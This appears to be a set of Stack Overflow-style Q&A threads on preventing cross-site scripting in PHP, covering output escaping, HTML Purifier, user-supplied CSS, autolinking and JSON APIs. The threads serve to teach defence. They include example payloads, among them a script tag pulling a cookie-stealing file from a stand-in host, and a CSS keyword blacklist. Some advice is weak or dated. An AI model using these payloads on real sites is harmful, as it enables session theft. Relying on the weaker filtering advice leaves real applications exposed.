I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saying, but when they say untrusted data, do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by never insert untrusted data except in allowed locations.
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output untrusted data in places on your web page where the browser expects to run instructions.
As shown in the article you linked, do not put user-generated data inside <script> tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following value:
""; console.log(document.cookie);//
Then the page your server sends to the browser will contain this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
Swap console.log() for a request to a server the attacker controls, and someone can easily steal your users' cookies and elevate their own privileges. Now imagine that you're using similar code to, say, show which user created the latest post, loaded via AJAX. That's a disaster waiting to happen if you do something like the above (and do not sanitize the username in the first place).
The same applies to <style>, <img>, <embed>, <iframe>, or any other tag that lets you run scripts or import resources. It also applies to HTML comments: browsers ignore comments, but some interpreters, such as the JSP parser, handle HTML comments as template text and don't ignore their contents.
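The safe way to get a PHP value into a script is to let json_encode() produce the JavaScript string literal instead of pasting the raw value in. A minimal sketch, assuming PHP 7.3+ (for JSON_THROW_ON_ERROR); greetingScript() is a hypothetical helper that rebuilds the greeting example above:

```php
<?php
// Hypothetical helper: builds the inline greeting script for a given username.
function greetingScript(string $username): string
{
    // json_encode() emits a complete, quoted JavaScript string literal.
    // The JSON_HEX_* flags turn < > & ' " into \u003C, \u003E, \u0026, \u0027, \u0022,
    // so the value can neither end the string literal nor close the <script> element.
    $jsUsername = json_encode(
        $username,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );

    return "<script>\n"
        . "var usernameSpanTag = document.getElementById('username');\n"
        . "usernameSpanTag.innerText = \"Welcome back, \" + $jsUsername + \"!\";\n"
        . "</script>";
}
```

With the malicious username, the double quotes come out as \u0022, so the whole payload stays inside a single string literal and is simply displayed as text.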
Rule #1 is pretty similar to rule #0. If you're developing web applications, at some point or another you will have to output user-generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, you may want to give your users some styling options for their text. Basic stuff like bold, underline and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is to let users write their own HTML if they choose to. But if you output your users' HTML unescaped, even in "safe" locations like between <p> tags, that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post!
but their browsers will also load an external JavaScript file that sends everybody's cookies to a remote location.
So always escape the data. In PHP you can use htmlspecialchars() or htmlentities(), or use a template engine like Twig, which escapes output for you automatically.
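A minimal sketch of escaping at output time, assuming the page is served as UTF-8. e() and renderPost() are hypothetical helper names (many template engines ship a similar short-hand); the point is that every piece of user data passes through htmlspecialchars() right where it is inserted into HTML:

```php
<?php
// Hypothetical short-hand for escaping untrusted text into HTML.
function e(string $value): string
{
    // ENT_QUOTES also escapes ' and ", so the result is safe inside quoted attributes.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical example: user data in an attribute value and in element content.
function renderPost(string $author, string $body): string
{
    return '<p class="post" data-author="' . e($author) . '">' . e($body) . '</p>';
}
```

Fed the "first post" example above, renderPost() emits &lt;script ...&gt;, which the browser displays as text instead of loading the script.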
I know similar questions have been asked but I am struggling to work out how to do it.
I am building a CMS, rather primitive right now, but it's as a learning exercise; in a production site, I would use an existing solution for sure.
I would like to take user input, which can be styled in a WYSIWYG editor. I would also like them to be able to insert images inline.
I understand I can store HTML in the database, but how can I safely re-render it? I know there is no problem with the HTML being stored, but it is my understanding that XSS becomes an issue if I simply dump the user-generated code into a layout template.
So the question, put simply, is: how can I store and safely re-render user content in a CMS? I am using Laravel and PHP. I also have a little knowledge of JavaScript if it's required.
For a CMS where you want to allow some tags but not others, you want something like HTML Purifier. It takes HTML, runs it against a whitelist, and regenerates HTML that is safe to display back to the user.
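To show what "run it against a whitelist and regenerate HTML" means, here is a rough sketch using PHP's built-in DOM extension. It is not a substitute for HTML Purifier, which also handles CSS, many more URL tricks and badly broken markup. The ALLOWED_TAGS list and the function names are hypothetical, and only http(s) URLs are kept in href/src:

```php
<?php
// Hypothetical whitelist: allowed tag => allowed attributes.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'b' => [], 'strong' => [], 'i' => [], 'em' => [], 'u' => [],
    'a' => ['href'],
    'img' => ['src', 'alt'],
];

// Only plain http(s) URLs are accepted (no javascript:, data:, ...).
function isSafeUrl(string $url): bool
{
    return preg_match('#^https?://#i', trim($url)) === 1;
}

function sanitizeChildren(DOMNode $parent): void
{
    // Copy the list first: removing nodes while walking a live DOMNodeList skips items.
    foreach (iterator_to_array($parent->childNodes, false) as $child) {
        if ($child instanceof DOMText) {
            continue; // plain text; saveHTML() escapes it again on output
        }
        $tag = $child instanceof DOMElement ? strtolower($child->tagName) : '';
        if (!array_key_exists($tag, ALLOWED_TAGS)) {
            // Comments and non-whitelisted elements (e.g. <script>) are dropped with their contents.
            $parent->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            $allowed = in_array($name, ALLOWED_TAGS[$tag], true)
                && (($name !== 'href' && $name !== 'src') || isSafeUrl($attr->value));
            if (!$allowed) {
                $child->removeAttribute($attr->name);
            }
        }
        sanitizeChildren($child);
    }
}

function sanitizeHtml(string $html): string
{
    $doc = new DOMDocument();
    // The XML declaration hints UTF-8 to libxml; the <div> wraps the user's fragment.
    $doc->loadHTML(
        '<?xml encoding="UTF-8"><div>' . $html . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD | LIBXML_NOERROR | LIBXML_NOWARNING
    );
    $wrapper = $doc->getElementsByTagName('div')->item(0);
    sanitizeChildren($wrapper);

    // Serialize only what ended up inside the wrapper.
    $out = '';
    foreach ($wrapper->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}
```

With HTML Purifier itself the call is roughly (new HTMLPurifier(HTMLPurifier_Config::createDefault()))->purify($html), and its configuration replaces the hand-written whitelist.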
A good and cheap way to avoid cross-site scripting is to have your PHP program entitize everything in your users' input before storing it in the database. That is, you want to take this entry from a user
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
and convert it to this before putting it into your database.
Hi there sucker! I just hacked your site.
&lt;script&gt;alert('You have been pwned!')&lt;/script&gt;
When you pass &lt; to a browser, it renders it as <, but it doesn't do anything else with it.
The htmlspecialchars() and htmlentities() functions can do this for you, and htmlspecialchars_decode() (or html_entity_decode() for htmlentities()) can reverse it if you need to. But you shouldn't reverse the operation unless you absolutely must, for example to load the document into an embedded editor for changes.
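You can also choose to entitize user-furnished text after you retrieve it from your database and before you display it. If you get to the point where several people work on your code, you may want to do both for safety; in that case, pass false as the double_encode argument of htmlspecialchars() on output, so text that was already entitized isn't encoded twice.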
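Entitizing both before storage and on output can double-encode, so users literally see "&lt;b&gt;" on the page. A minimal sketch of the problem and of htmlspecialchars()'s fourth parameter (double_encode), assuming UTF-8 text; the sample string is made up:

```php
<?php
$flags = ENT_QUOTES | ENT_SUBSTITUTE;

// What the stored value looks like if it was entitized before saving.
$stored = htmlspecialchars("<b>Tom & Jerry</b>", $flags, 'UTF-8');
// $stored === '&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;'

// Escaping it again on output double-encodes every entity.
$doubled = htmlspecialchars($stored, $flags, 'UTF-8');
// $doubled === '&amp;lt;b&amp;gt;Tom &amp;amp; Jerry&amp;lt;/b&amp;gt;'

// double_encode = false leaves existing entities alone,
// while still escaping any raw < > & " ' that slipped through.
$safe = htmlspecialchars($stored, $flags, 'UTF-8', false);
// $safe === '&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;'
```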
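You can also render escaped user-provided input inside <pre>content</pre> tags, which preserves its spacing and line breaks. Note that <pre> by itself does not stop the browser from parsing tags inside it, so the content still has to be entitized.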
(Use right-click Inspect on this very page to see how Stack Overflow handles my malicious example.)
On my website I want to include a text box that will allow members to change anything they want CSS-wise on their profiles, but I don't want to wake up one morning to find my site has been hacked, or that someone made a typo and destroyed everything or accessed things they shouldn't.
Is there any easy way to verify that the text they input is CSS only? I saw a similar question here that linked an XSS cheat sheet and tips on what to disable (<, ]]> and <![), but I don't know if that will be enough. I will definitely use that info, though.
Essentially I want PHP to load any custom CSS and insert it between <style> tags on the user's profile. I want to allow as much CSS as possible. Is this the best way to go about it? I don't have the know-how to build a system that generates safe files, or the patience to build an entire section with options (especially since I want to give members more freedom with their profiles).
Any advice is appreciated, and if anyone knows of some script that does this already that would rock too and help me figure out what to do :D.
When a user is logged in, add a separate <link> element for that user. The href can point to a script that generates the CSS for the user, for instance customcss.php?userid=1234&version=2 *). The script only needs to return whatever the user has entered before. Because you include it as a separate CSS file, the browser will always treat it as CSS and will never run it as HTML or script. Any HTML or JavaScript is just treated as invalid CSS.
Note, however, that there's little harm in including scripts anyway, because they will only run in the browser of the logged-in user, so they can only hack their own view of your site. If they want to inject JavaScript, they can already do that by writing their own browser plugins, so you won't open up a possibility that wasn't there before.
The main things you need to worry about are:
Usability. What if the user makes a mistake and accidentally hides the body element? How will they be able to reset it?
SQL injection. No matter what you do or do not allow, always make sure your input is sanitized before it goes into a query (prepared statements are the safest way).
PHP injection. Don't execute (eval) user content. Ever.
Hiding user information. Add a hard-to-guess code to the customcss.php URL, so other users can't guess a user ID and gain insight into other users' customizations.
*) I've added a version number to the CSS url, which you should update in the database each time a user updates their CSS. If you don't do that, the browsers will cache the old CSS and users will start complaining to you, because their changes won't become visible.
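The pieces of this answer can be sketched in PHP as follows, assuming PHP 7.1+. An HMAC of the user ID is one way (an assumption, not the only option) to implement the hard-to-guess code in the URL; CSS_URL_SECRET and all function names are hypothetical. customCssResponse() returns the headers and body instead of sending them, so the logic can be checked without a web server:

```php
<?php
// Hypothetical server-side secret; load it from configuration in a real application.
const CSS_URL_SECRET = 'replace-with-a-long-random-secret';

// Unguessable per-user token, so other users can't fetch someone's CSS by guessing IDs.
function customCssToken(int $userId): string
{
    return hash_hmac('sha256', (string) $userId, CSS_URL_SECRET);
}

// The <link> element for the logged-in user; bump $version whenever they save new CSS.
function customCssLink(int $userId, int $version): string
{
    $url = 'customcss.php?' . http_build_query([
        'userid'  => $userId,
        'version' => $version,
        'token'   => customCssToken($userId),
    ], '', '&');
    return '<link rel="stylesheet" href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">';
}

// What customcss.php would send back; null means "respond with 403 Forbidden".
function customCssResponse(int $userId, string $token, string $storedCss): ?array
{
    if (!hash_equals(customCssToken($userId), $token)) {
        return null;
    }
    return [
        'headers' => [
            'Content-Type: text/css; charset=UTF-8',
            'X-Content-Type-Options: nosniff',
        ],
        'body' => $storedCss,
    ];
}
```

In customcss.php itself you would call header() for each entry in 'headers' and then echo 'body'. The text/css content type is what makes the browser treat the user's text purely as a stylesheet.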
I guess this should be enough
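$style = isset($_POST['style']) ? (string) $_POST['style'] : '';
// Remove any HTML tags the user typed.
$style = strip_tags($style);
// CSS constructs that can run script (old IE/Firefox hooks) or load script URLs.
$forbiddenStuff = array(
'-moz-binding',
'expression',
'javascript:',
'behavior',
'behaviour:',
'vbscript:',
'mocha:',
'livescript:',
);
// Repeat until nothing changes, so nested input such as "expexpressionression"
// can't reassemble a forbidden word after a single pass.
do {
    $previous = $style;
    $style = str_ireplace($forbiddenStuff, '', $style);
} while ($style !== $previous);
// Store $style in the database and render it on the user's profile.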
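Please note that this solution is copied from a well-known piece of software with a big community, so I hope it is good enough. Keep in mind that a blacklist like this can still miss tricks such as CSS escape sequences (e.g. \65 xpression), so treat it as a first line of defense rather than a guarantee.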
O hai MySpace…
Just give users the ability to specify colours and images from a web form, and construct a user-specific style sheet from that. Allowing users to specify their own CSS in its entirety will just lead to ugly, ugly pages. See: MySpace 1.0.
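A minimal sketch of that whitelist approach, assuming PHP 7.1+: the profile form offers a few fixed fields, each value is validated (hex colours and https image URLs only), and the style sheet is assembled by your own code, so user text never becomes CSS syntax. The field names, selectors and helper functions are hypothetical:

```php
<?php
// Hypothetical form fields => [selector, CSS property] they control.
const PROFILE_STYLE_FIELDS = [
    'background_color' => ['body', 'background-color'],
    'text_color'       => ['body', 'color'],
    'link_color'       => ['a', 'color'],
];

// Accept only #rgb or #rrggbb.
function isHexColor(string $value): bool
{
    return preg_match('/^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/i', $value) === 1;
}

// Accept only https URLs without characters that could break out of url("...").
function isSafeImageUrl(string $value): bool
{
    return filter_var($value, FILTER_VALIDATE_URL) !== false
        && preg_match('#^https://#i', $value) === 1
        && strpbrk($value, "\"'()<>\\ ") === false;
}

function buildProfileCss(array $input): string
{
    $rules = [];
    foreach (PROFILE_STYLE_FIELDS as $field => [$selector, $property]) {
        $value = $input[$field] ?? '';
        if (is_string($value) && isHexColor($value)) {
            $rules[] = "$selector { $property: $value; }";
        }
        // Invalid or missing values are silently skipped.
    }
    $image = $input['background_image'] ?? '';
    if (is_string($image) && isSafeImageUrl($image)) {
        $rules[] = "body { background-image: url(\"$image\"); }";
    }
    return implode("\n", $rules);
}
```

Because invalid values are dropped rather than "cleaned", there is no blacklist to get around, at the price of offering fewer options.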
The admin users of a module that I'm developing want links in the textarea(s) they fill in to be created automatically.
For example, if they write:
Please visit our page http://page.com
They want http://page.com to be converted automatically into a link:
<a href="http://page.com">http://page.com</a>
I want to do this in the best possible way in terms of usability and performance.
I can't change the type of field (textarea), but I can make modifications with PHP and JavaScript, which is always enabled (no frameworks).
The users frequently edit the fields, and the links only matter when they "publish" the forms, because the content of those textareas is displayed inside an HTML table.
A textarea input could have more than one link.
I appreciate your opinions and points of view to resolve this common situation.
In my opinion, you should handle this situation:
using PHP,
after reading the textarea contents from DB where it was stored,
before sending the HTML output
I don't know the details of your application context and its users, but when you output any user input as HTML, you must take care of security issues such as XSS attacks, among others.
If $textarea_contents is the variable where the textarea contents are (read from the DB), I would apply the htmlspecialchars function first:
$output = htmlspecialchars( $textarea_contents );
After this, you can parse the output string or use a regular expression to transform the URLs into anchor elements. Your choice depends on the level of precision you want. A couple of options are:
http://code.iamcal.com/php/lib_autolink/lib_autolink.phps
http://jmrware.com/articles/2010/linkifyurl/linkify.html
It is also worth reading this article about the surprisingly complex problem of linkifying strings (from the creator of the Stack Overflow website):
http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html
Good luck!
$code = preg_replace('/((https?|ftp):\/\/(?:[A-Z0-9-]+\.)+[A-Z]{2,6}([\/?].+)?)/i', '<a href="$1">$1</a>', $code);
(Regex Source)
This regex is better, since it takes care of the parameters passed in the URL and stops where the URL ends, without taking in spaces or the words that follow.
(https?|ftp)://([-A-Z0-9.]+)(/[-A-Z0-9+&@#/%=~_|!:,.;]*)?(\?[A-Z0-9+&@#/%=~_|!:,.;]*)?
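Putting the two answers together, a minimal PHP sketch: escape the textarea contents first with htmlspecialchars(), then wrap each URL matched by the regex above (with @# in its character classes, used case-insensitively) in an anchor. linkify() is a hypothetical name; since the matched text is already escaped, it can be placed in the href attribute as-is, and only http, https and ftp URLs are ever linked:

```php
<?php
// The URL regex from the answer above, with / escaped for the / delimiter.
const URL_PATTERN = '/(https?|ftp):\/\/([-A-Z0-9.]+)(\/[-A-Z0-9+&@#\/%=~_|!:,.;]*)?(\?[A-Z0-9+&@#\/%=~_|!:,.;]*)?/i';

function linkify(string $textareaContents): string
{
    // 1. Escape first, so any HTML the user typed is shown as plain text.
    $escaped = htmlspecialchars($textareaContents, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Then wrap every URL in an anchor. The match contains no raw quotes or <,
    //    because step 1 already turned them into entities.
    return preg_replace_callback(URL_PATTERN, function (array $m): string {
        return '<a href="' . $m[0] . '">' . $m[0] . '</a>';
    }, $escaped);
}
```

Doing this in PHP when the content is published keeps the stored text untouched, so users keep editing plain text in the textarea.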
Any other suggestions for handling this situation? Should I use JavaScript or PHP? Any ideas?
I always run user-supplied input through both the htmlentities() and mysql_real_escape_string() functions.
But now I am building a CMS which has a WYSIWYG editor in the admin section. I noticed that using htmlentities() on the WYSIWYG-edited user content removes all styles and throws a bunch of quotes onto the front-end article page (as can be expected).
So is it OK not to clean the HTML/JavaScript entered by the user in this situation? I will still use mysql_real_escape_string(), which doesn't conflict.
Although the admin is the only one who will have access to the back end, I can think of at least one scenario: suppose a hacker somehow got access to the "create a post" page. Although they could wreak havoc by deleting posts, etc., they might instead use it as an opportunity to send visitors to their own site by making this post:
<script>window.location = "http://evilsite.com"</script>
So what should I do? and also are there any functions that will disable javascript but not html and inline css?
The WYSIWYG editor is TinyMCE, by the way.
It is never OK to not clean user input. Anybody can sabotage your system, just like you hypothesized. This kind of risk is simply not worth taking.
That said, in your case it depends on the WYSIWYG editor you use. Look through TinyMCE's documentation or ask around, and see what it says about displaying/rendering HTML output from its rich text editor with regard to XSS vulnerabilities.
I am thinking of secure ways to serve HTML and JSON to JavaScript. Currently I am just outputting the JSON like:
ajax.php?type=article&id=15
{
"name": "something",
"content": "some content"
}
but I do realize this is a security risk, because the articles are created by users. So someone could insert script tags (just an example) into the content and link to their article directly in the AJAX API. Thus, I am now wondering what's the best way to prevent such issues. One way would be to encode all non-alphanumeric characters in the input, then decode them in JavaScript (and encode them again when they are put somewhere).
Another option could be to send some headers that force the browser to never render the response of the AJAX API requests (Content-Type and X-Content-Type-Options).
If you set the Content-Type to application/json, modern browsers will not execute JavaScript in that response; add X-Content-Type-Options: nosniff so that browsers which sniff content types don't treat it as HTML either. The application/json media type is defined in RFC 4627, and Google uses this to protect itself. Other application/ content types follow similar rules.
You still have to worry about DOM-based XSS, but that would be a problem with your JavaScript, not really with the content of the JSON. Another, more exotic security concern with JSON is information leakage, like this vulnerability in Gmail.
Make sure to always test your code. There is the free Sitewatch XSS scanner, or the open-source Skipfish, and finally you can test it manually with a simple <script>alert(/xss/)</script>.
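A minimal sketch of ajax.php along those lines, assuming PHP 7.3+ (for JSON_THROW_ON_ERROR); articleJson() and sendArticleJson() are hypothetical names. Besides the two headers, the JSON_HEX_* flags encode < > & ' " as \u00XX escapes, so even a browser that did render the body as HTML would find no tags in it:

```php
<?php
// Encode an article for the AJAX API.
function articleJson(array $article): string
{
    return json_encode(
        $article,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Send it with the headers discussed above; call this before any other output.
function sendArticleJson(array $article): void
{
    header('Content-Type: application/json; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    echo articleJson($article);
}
```

json_decode() (or JSON.parse() in the browser) gives back the original strings, so on the client side the content should still be inserted with textContent rather than innerHTML to avoid DOM-based XSS.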
Instead of worrying about how you could encode the malicious code when you return it, you should probably make sure that it does not even get into your database. A quick Google search about preventing cross-site scripting and input validation might help you here. Cheers
If the user has to be logged in to view the web page then secure the ajax.php with the same authorization mechanism. Then a client that's not logged in cannot access ajax.php directly to retrieve the data.
I don't think your question is about validating user input, as others pointed out. You don't want to provide your JSON API to other people... right?
If this is the case, then there isn't much you can do... in fact, even if you were serving HTML instead of JSON, people would still scrape the HTML to get what they wanted from your site (this is how search engine spiders work).
A good way to limit scraping is to allow only a certain number of downloads per IP address. This way, if someone requests http://yoursite.com/somejson.json more than 100 times a day, it's probably a scraper, not someone visiting your page 100 times in one day.
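A minimal sketch of the counting logic behind a per-IP daily limit. DailyRequestLimiter is a hypothetical class, and it keeps its counts in a plain array only for illustration: a PHP array is gone after every request, so a real version would keep the counts in a database or cache shared between requests:

```php
<?php
final class DailyRequestLimiter
{
    private $maxPerDay;
    private $counts = []; // "Y-m-d|ip" => number of requests seen that day

    public function __construct(int $maxPerDay = 100)
    {
        $this->maxPerDay = $maxPerDay;
    }

    // Records one request and returns false once the IP is over its daily allowance.
    public function allow(string $ip, ?DateTimeInterface $now = null): bool
    {
        $day = ($now ?? new DateTimeImmutable())->format('Y-m-d');
        $key = $day . '|' . $ip;
        $this->counts[$key] = ($this->counts[$key] ?? 0) + 1;
        return $this->counts[$key] <= $this->maxPerDay;
    }
}
```

In ajax.php this would be used as: if (!$limiter->allow($_SERVER['REMOTE_ADDR'])) { http_response_code(429); exit; }. Keep in mind that many users can share one IP address behind a proxy or NAT.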
Insertion of script tags (or SQL) is only a problem if you fail to ensure it isn't at the point that it could be a problem.
A <script> tag in the middle of a comment that somebody submits will not hurt your server and it won't hurt your database. What it would hurt, if you fail to take appropriate measures, would be a page that includes the comment when you subsequently serve it up and it reaches a client browser. In order to prevent that from happening, your code that prepares the page must make sure that user-supplied content is always scrubbed before it is exposed to an unaware interpreter. In this case, that unaware interpreter is a client web browser. In fact, your client web browser really involves two unaware interpreters: the HTML parser & layout engine and the Javascript interpreter.
Another important example of an unaware interpreter is your database server. Note that a <script> tag is (almost certainly) harmless to your database, because "<script>" doesn't mean anything in SQL. It's other sorts of input that cause problems for SQL, like quotes in strings (which are harmless to your HTML pages!).
Stack Overflow would be pretty lame if I couldn't put <script> tags in my answers, as I'm doing now. The same goes for examples of SQL injection attacks. Recently somebody linked a page from a prominent US bank, where a big <textarea> was footnoted by a warning not to include the characters "<" or ">" in whatever you typed. Predictably, the bank was ridiculed in hundreds of Reddit comments, and rightly so.
Exactly how you "scrub" user-supplied content depends on the unaware interpreter you're delivering it to. If it's going to be dropped into the middle of HTML markup, you have to make sure that the "<", ">", and "&" characters are all encoded as HTML entities. (You might want to encode quote characters too, if the content might end up in an HTML attribute value.) If the content is to be dropped into JavaScript, however, you may not need to worry about HTML escaping, but you do need to worry about quotes, and possibly Unicode characters outside the 7-bit range.
For outputting safe HTML from PHP, I recommend http://htmlpurifier.org/